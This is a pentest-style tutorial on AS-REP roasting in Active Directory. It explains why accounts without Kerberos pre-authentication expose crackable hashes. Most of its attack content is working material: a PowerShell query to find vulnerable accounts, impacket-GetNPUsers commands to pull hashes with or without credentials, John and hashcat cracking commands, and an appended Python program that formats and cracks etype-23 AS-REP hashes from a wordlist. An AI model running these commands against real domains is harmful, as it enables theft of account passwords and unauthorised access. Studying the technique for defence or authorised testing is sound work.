AS-REP Roast

Theory

AS-REP roasting is, in my opinion, an often-overlooked attack. It is not extremely common, because an account only becomes vulnerable when an administrator explicitly ticks "Do not require Kerberos preauthentication" on it, which sets the DONT_REQ_PREAUTH flag (0x400000, decimal 4194304) in the account's userAccountControl attribute.

Pre-authentication is the first step of Kerberos authentication, and its main role is to prevent brute-force password guessing attacks.

Typically, during pre-auth the client derives the user's long-term key from the credentials the user entered and uses that key to encrypt a timestamp. The DC decrypts the timestamp with the key it holds for that user; if it checks out, the DC issues a TGT. If pre-authentication is disabled for an account, an attacker can send an AS-REQ for that user without proving anything, and the DC simply replies with an AS-REP. The TGT inside the reply is encrypted with the krbtgt key and is useless to the attacker, but the reply's enc-part is encrypted with the user's own key (the NT hash when RC4-HMAC is used). Much like the service ticket in a Kerberoast attack, that blob can be taken offline and cracked by guessing passwords until one decrypts it correctly.

AS-REP roasting is nice because you don't even need a domain-joined machine or a domain user; you only need network access to the KDC (port 88). Being on a domain-joined machine or having domain credentials does make the enumeration step much easier, though, because you can find targets with an LDAP filter on the DONT_REQ_PREAUTH bit of userAccountControl or with PowerView.

Such as:

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name

Request AS-REP Message

If you have a credential (note the forward slash between domain and user, and that -request is needed to actually pull the hashes rather than only list the vulnerable accounts):

impacket-GetNPUsers '<domain>/<username>:<password>' -dc-ip <dc_ip> -request -format hashcat -outputfile hashes.asreproast

If you don't have a credential, feed it a list of candidate usernames; every name that exists and has pre-auth disabled yields a hash:

impacket-GetNPUsers <domain>/ -dc-ip <dc_ip> -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast

Note that the / in <domain>/ is required, otherwise GetNPUsers won't recognize that string as a domain.

AS-REP Cracking

Crack the AS-REP enc-part (the $krb5asrep$ line GetNPUsers wrote out) with John:

john --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt hashes.asreproast

Or with hashcat. Mode 18200 is for etype 23 (RC4-HMAC) lines, which begin with $krb5asrep$23$ and are what GetNPUsers asks the DC for first; a line beginning $krb5asrep$17$ or $krb5asrep$18$ was encrypted with AES and needs hashcat's AES AS-REP modes instead. --force only suppresses hashcat's safety warnings and is not needed:

hashcat -m 18200 -a 0 hashes.asreproast /usr/share/wordlists/rockyou.txt
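To make concrete both why the AS-REP enc-part is crackable (Theory section) and what John and hashcat are actually doing in the commands above, here is an added example that is not part of this page or of impacket: a minimal RC4-HMAC (etype 23, RFC 4757) implementation that builds an AS-REP enc-part the way a DC would, formats it as the $krb5asrep$23$ line GetNPUsers emits, and then cracks it offline from a wordlist. The user name svc_backup, realm CORP.LOCAL, password, confounder, wordlist and the stand-in EncASRepPart bytes are all constructed for the demo; MD4 is implemented by hand because OpenSSL 3 builds often hide it from hashlib.

```python
import hashlib
import hmac
import struct

# Added example (not the page's own code): RC4-HMAC (etype 23, RFC 4757) used to
# produce an AS-REP enc-part like a DC would, emit it in the $krb5asrep$23$ format
# GetNPUsers/hashcat use, and crack it offline. Every input below is constructed.

MASK32 = 0xFFFFFFFF
KEY_USAGE_AS_REP_ENC_PART = 8  # RFC 4120 key usage number for the AS-REP enc-part


def _rotl(x, n):
    x &= MASK32
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data):
    """Pure-Python MD4 (RFC 1320); OpenSSL 3 builds often hide MD4 from hashlib."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = [  # (mix function, round constant, word order, shift cycle)
        (lambda x, y, z: (x & y) | (~x & z), 0, range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    ]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, const, order, shifts in rounds:
            for i, w in enumerate(order):
                a = _rotl(a + fn(b, c, d) + X[w] + const, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = [(v + s) & MASK32 for v, s in ((a, aa), (b, bb), (c, cc), (d, dd))]
    return struct.pack("<4I", a, b, c, d)


def rc4(key, data):
    """Plain RC4; etype 23 uses it as the cipher with a per-message key (RFC 4757)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def nt_hash(password):
    """The etype-23 long-term key is just the NT hash: MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def _hmac_md5(key, data):
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key, usage, plaintext, confounder):
    """RFC 4757 section 6 encryption; returns (checksum, edata) like a KDC would."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    checksum = _hmac_md5(k1, confounder + plaintext)
    k3 = _hmac_md5(k1, checksum)
    return checksum, rc4(k3, confounder + plaintext)


def build_asrep_hash(user, realm, password, plaintext, confounder):
    """Format the enc-part as the $krb5asrep$23$ line GetNPUsers/hashcat 18200 use."""
    checksum, edata = rc4_hmac_encrypt(nt_hash(password), KEY_USAGE_AS_REP_ENC_PART,
                                       plaintext, confounder)
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${edata.hex()}"


def crack_asrep(hash_line, wordlist):
    """Offline guessing: derive the key from each candidate, decrypt, verify the HMAC."""
    header, body = hash_line.split(":", 1)
    if not header.startswith("$krb5asrep$23$"):
        raise ValueError("only etype 23 (RC4-HMAC) lines are handled here")
    checksum_hex, edata_hex = body.split("$")
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    for candidate in wordlist:
        k1 = _hmac_md5(nt_hash(candidate), struct.pack("<I", KEY_USAGE_AS_REP_ENC_PART))
        k3 = _hmac_md5(k1, checksum)
        plain = rc4(k3, edata)  # confounder || EncASRepPart if the guess is right
        if hmac.compare_digest(_hmac_md5(k1, plain), checksum):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed stand-in for the DER-encoded EncASRepPart (real ones begin with 0x79).
    fake_enc_part = b"\x79" + b"constructed EncASRepPart placeholder"
    line = build_asrep_hash("svc_backup", "CORP.LOCAL", "Summer2019!",
                            fake_enc_part, confounder=bytes(range(8)))
    print(line)
    print("cracked:", crack_asrep(line, ["letmein", "Password1", "Summer2019!"]))
```

Each guess costs one MD4, three HMAC-MD5 computations and one RC4 pass over the blob, with no salt and no contact with the DC, which is why rockyou.txt goes through in seconds and why an account with pre-auth disabled is only as safe as its password.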
